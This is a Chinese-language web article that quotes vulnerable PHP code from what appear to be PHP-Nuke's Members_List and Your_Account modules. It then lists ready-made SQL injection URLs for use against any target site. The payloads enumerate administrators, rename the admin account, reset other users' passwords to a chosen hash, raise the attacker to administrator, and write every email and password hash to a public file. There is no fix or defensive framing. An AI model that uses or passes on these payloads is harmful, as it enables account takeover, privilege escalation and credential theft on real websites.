利用SQL注入缺陷进行攻击的方法及代码

SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷:

PHP代码/位置:

?/modules/Members_List/index.php :
------------------------------------------------------------------------
[...]
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from
".$user_prefix."_users ";
$where = "where uname != Anonymous ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname like ".$letter."% ";

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname REGEXP "^\[1-9]" ";

} else {
$where .= "";
}
$sort = "order by $sortby";
$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();

echo "

1<br/>

";
if ( $letter != "front" ) {
echo "

  1<table border='\"0\"' cellspacing='\"1\"' width='\"100%\"'><tr>\n";   
  2echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._NICKNAME."</b></font></td>\n";   
  3echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._REALNAME."</b></font></td>\n";   
  4echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._EMAIL."</b></font></td>\n";   
  5echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._URL."</b></font></td>\n";   
  6$cols = 4;   
  7[...]   
  8\------------------------------------------------------------------------   
  9  
 10/modules/Your_Account/index.php :   
 11switch($op) {   
 12[...]   
 13case "mailpasswd":   
 14mail_password($uname, $code);   
 15break;   
 16  
 17case "userinfo":   
 18userinfo($uname, $bypass, $hid, $url);   
 19break;   
 20  
 21case "login":   
 22login($uname, $pass);   
 23break;   
 24[...]   
 25case "saveuser":   
 26saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,   
 27$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,   
 28$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);   
 29break;   
 30[...]   
 31case "savehome":   
 32savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,   
 33$popmeson);   
 34break;   
 35  
 36case "savetheme":   
 37savetheme($uid, $theme);   
 38break;   
 39[...]   
 40case "savecomm":   
 41savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);   
 42break;   
 43[...]   
 44}   
 45\------------------------------------------------------------------------   
 46  
 47/modules/Your_Account/index.php :   
 48[...]   
 49function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,   
 50$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,   
 51$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {   
 52global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,   
 53$module_name;   
 54Cookiedecode($user);   
 55$check = $Cookie[1];   
 56$check2 = $Cookie[2];   
 57$result = sql_query("select uid, pass from ".$user_prefix."_users where   
 58uname=$check", $dbi);   
 59list($vuid, $ccpass) = sql_fetch_row($result, $dbi);   
 60if (($uid == $vuid) AND ($check2 == $ccpass)) {   
 61if (!eregi("http://";, $url)) {   
 62$url = "http://$url";   
 63}   
 64if ((isset($pass)) &amp;&amp; ("$pass" != "$vpass")) {   
 65echo "<center>"._PASSDIFFERENT."</center>";   
 66} elseif (($pass != "") &amp;&amp; (strlen($pass) &lt; $minpass)) {   
 67echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>   
 68"._CHARLONG."</center>";   
 69} else {   
 70if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =   
 71FixQuotes($bio); }   
 72if ($pass != "") {   
 73Cookiedecode($user);   
 74sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);   
 75$pass = md5($pass);   
 76sql_query("update ".$user_prefix."_users set name=$realname,   
 77email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,   
 78user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,   
 79user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,   
 80user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,   
 81newsletter=$newsletter where uid=$uid", $dbi);   
 82$result = sql_query("select uid, uname, pass, storynum, umode, uorder,   
 83thold, noscore, ublockon, theme from ".$user_prefix."_users where   
 84uname=$uname and pass=$pass", $dbi);   
 85if(sql_num_rows($result, $dbi)==1) {   
 86$userinfo = sql_fetch_array($result, $dbi);   
 87  
 88doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],   
 89$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],   
 90$userinfo[theme],$userinfo[commentmax]);   
 91} else {   
 92echo "<center>"._SOMETHINGWRONG."</center><br/>";   
 93}   
 94sql_query("UNLOCK TABLES", $dbi);   
 95} else {   
 96sql_query("update ".$user_prefix."_users set name=$realname,   
 97email=$email, femail=$femail, url=$url, bio=$bio,   
 98user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,   
 99user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,   
100user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,   
101newsletter=$newsletter where uid=$uid", $dbi);   
102if ($attach) {   
103$a = 1;   
104} else {   
105$a = 0;   
106}   
107}   
108Header("Location: modules.php?name=$module_name");   
109}   
110}   
111}   
112[...]   
113function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,   
114$popmeson) {   
115global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;   
116Cookiedecode($user);   
117$check = $Cookie[1];   
118$check2 = $Cookie[2];   
119$result = sql_query("select uid, pass from ".$user_prefix."_users where   
120uname=$check", $dbi);   
121list($vuid, $ccpass) = sql_fetch_row($result, $dbi);   
122if (($uid == $vuid) AND ($check2 == $ccpass)) {   
123if(isset($ublockon)) $ublockon=1; else $ublockon=0;   
124$ublock = FixQuotes($ublock);   
125sql_query("update ".$user_prefix."_users set storynum=$storynum,   
126ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,   
127popmeson=$popmeson where uid=$uid", $dbi);   
128getusrinfo($user);   
129doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],   
130$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],   
131$userinfo[theme],$userinfo[commentmax]);   
132Header("Location: modules.php?name=$module_name");   
133}   
134}   
135  
136function savetheme($uid, $theme) {   
137global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;   
138Cookiedecode($user);   
139$check = $Cookie[1];   
140$check2 = $Cookie[2];   
141$result = sql_query("select uid, pass from ".$user_prefix."_users where   
142uname=$check", $dbi);   
143list($vuid, $ccpass) = sql_fetch_row($result, $dbi);   
144if (($uid == $vuid) AND ($check2 == $ccpass)) {   
145sql_query("update ".$user_prefix."_users set theme=$theme where   
146uid=$uid", $dbi);   
147getusrinfo($user);   
148doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],   
149$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],   
150$userinfo[theme],$userinfo[commentmax]);   
151Header("Location: modules.php?name=$module_name&amp;theme=$theme");   
152}   
153}   
154[...]   
155function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,   
156$commentmax) {   
157global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;   
158Cookiedecode($user);   
159$check = $Cookie[1];   
160$check2 = $Cookie[2];   
161$result = sql_query("select uid, pass from ".$user_prefix."_users where   
162uname=$check", $dbi);   
163list($vuid, $ccpass) = sql_fetch_row($result, $dbi);   
164if (($uid == $vuid) AND ($check2 == $ccpass)) {   
165if(isset($noscore)) $noscore=1; else $noscore=0;   
166sql_query("update ".$user_prefix."_users set umode=$umode,   
167uorder=$uorder, thold=$thold, noscore=$noscore,   
168commentmax=$commentmax where uid=$uid", $dbi);   
169getusrinfo($user);   
170doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],   
171$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],   
172$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);   
173Header("Location: modules.php?name=$module_name");   
174}   
175}   
176[...]   
177\------------------------------------------------------------------------   
178  
179/modules/Your_Account/index.php :   
180[...]   
181function mail_password($uname, $code) {   
182global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,   
183$module_name;   
184$result = sql_query("select email, pass from ".$user_prefix."_users   
185where (uname=$uname)", $dbi);   
186if(!$result) {   
187include("header.php");   
188OpenTable();   
189echo "<center>"._SORRYNOUSERINFO."</center>";   
190CloseTable();   
191include("footer.php");   
192[...]   
193\------------------------------------------------------------------------   
194  
195  
196\------------------------------------------------------------------------   
197[...]   
198function userinfo($uname, $bypass=0, $hid=0, $url=0) {   
199global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,   
200$broadcast_msg, $my_headlines, $module_name;   
201$result = sql_query("select uid, femail, url, bio, user_avatar,   
202user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,   
203user_sig, pass, newsletter from ".$user_prefix."_users where   
204uname=$uname", $dbi);   
205$userinfo = sql_fetch_array($result, $dbi);   
206[...]   
207\------------------------------------------------------------------------   
208  
209  
210\------------------------------------------------------------------------   
211[...]   
212function login($uname, $pass) {   
213global $setinfo, $user_prefix, $dbi, $module_name;   
214$result = sql_query("select pass, uid, storynum, umode, uorder, thold,   
215noscore, ublockon, theme, commentmax from ".$user_prefix."_users where   
216uname=$uname", $dbi);   
217$setinfo = sql_fetch_array($result, $dbi);   
218[...]   
219}   
220[...]   
221\------------------------------------------------------------------------   
222---  
223  
224  
225Members_List模块:   
226  
227\- 显示用户:   
228  
229http://[target]/modules.php?name=Members_List&amp;letter=All&amp;sortby=pass   
230  
231\- 显示用户:   
232  
233http://[target]/modules.php?name=Members_List&amp;letter=All&amp;sortby=uid   
234  
235\- 显示moderators :   
236  
237http://[target]/modules.php?name=Members_List&amp;letter=%20OR%20user_level=2/*   
238  
239\- 显示管理员:   
240  
241http://[target]/modules.php?name=Members_List&amp;letter=%20OR%20user_level=4/*   
242  
243\- 显示所有以“abc”开头的用户 :   
244  
245http://[target]/modules.php?name=Members_List&amp;letter=%20OR%20pass%20LIKE%20abc%25/*   
246  
247Your_Account模块 :   
248  
249\- 将“Admind”用户更名为“Hophophop” :   
250  
251http://[target]/modules.php?name=Your_Account&amp;op=savetheme&amp;theme=,name=Hophophop%20where%20uname=Admin/*&amp;uid=[OUR_UID]   
252  
253\- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:   
254  
255http://[target]/modules.php?name=Your_Account&amp;op=savetheme&amp;theme=,   
256pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
257或:   
258  
259http://[target]/modules.php?name=Your_Account&amp;op=saveuser&amp;realname=,   
260pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
261或:   
262  
263http://[target]/modules.php?name=Your_Account&amp;op=saveuser&amp;email=,   
264pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
265或:   
266  
267http://[target]/modules.php?name=Your_Account&amp;op=savehome&amp;storynum=,   
268pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
269或:   
270  
271http://[target]/modules.php?name=Your_Account&amp;op=savehome&amp;ublockon=,   
272pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
273或:   
274  
275http://[target]/modules.php?name=Your_Account&amp;op=savecomm&amp;umode=,   
276pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
277或:   
278  
279http://[target]/modules.php?name=Your_Account&amp;op=savecomm&amp;thold=,   
280pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&amp;uid=[OUR_UID]   
281  
282\- 将普通用户提升至管理员权限:   
283  
284http://[target]/modules.php?name=Your_Account&amp;op=savetheme&amp;theme=,user_level=4&amp;uid=[OUR_UID]   
285  
286或:   
287  
288http://[target]/modules.php?name=Your_Account&amp;op=saveuser&amp;femail=,user_level=4&amp;uid=[OUR_UID]   
289  
290或:   
291  
292http://[target]/modules.php?name=Your_Account&amp;op=saveuser&amp;url=http://,user_level=4&amp;uid=[OUR_UID]   
293  
294或:   
295  
296http://[target]/modules.php?name=Your_Account&amp;op=savehome&amp;broadcast=,user_level=4&amp;uid=[OUR_UID]   
297  
298或:   
299  
300http://[target]/modules.php?name=Your_Account&amp;op=savecomm&amp;uorder=,user_level=4&amp;uid=[OUR_UID]   
301  
302\- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :   
303  
304http://[target]/modules.php?name=Your_Account&amp;op=mailpasswd&amp;uname=)   
305%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*   
306  
307利用Cookie发送crypted密码能访问用户帐户。   
308  
309\- 将用户的所有信息保存在http://[target]/admintxt中:   
310  
311http://[target]/modules.php?name=Your_Account&amp;op=login&amp;uname=%20OR%user_level&gt;   
3121%20INTO%20OUTFILE%20/[path/to/site]/admin.txt   
313  
314[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。</tr></table>
Published At
Categories with 数据库类
Tagged with
comments powered by Disqus